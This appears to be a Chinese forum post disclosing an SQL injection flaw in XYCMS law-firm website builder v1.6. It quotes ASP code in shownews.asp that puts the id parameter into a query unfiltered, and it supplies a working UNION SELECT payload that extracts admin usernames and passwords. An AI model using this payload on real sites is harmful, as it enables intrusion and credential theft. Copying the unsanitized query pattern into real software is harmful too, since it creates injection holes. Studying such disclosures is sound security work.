XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似淫荡分割线
--------------------------------------------------------
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
源码地址:http://down.chinaz.com/soft/29233.htm
漏洞文件:shownews.asp
漏洞代码:7-13行
<%
id=request.QueryString("id")
set snews=server.createobject("adodb.recordset")
exec="select * from where id="&id
snews.open exec,conn,1,1
%>
什么过滤都没有直造成注入
注入点:http://127.0.0.1:99/shownews.asp?id=xx
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
exp: union select 1,admin,password,4,5,7 from admin_user
页:
[1]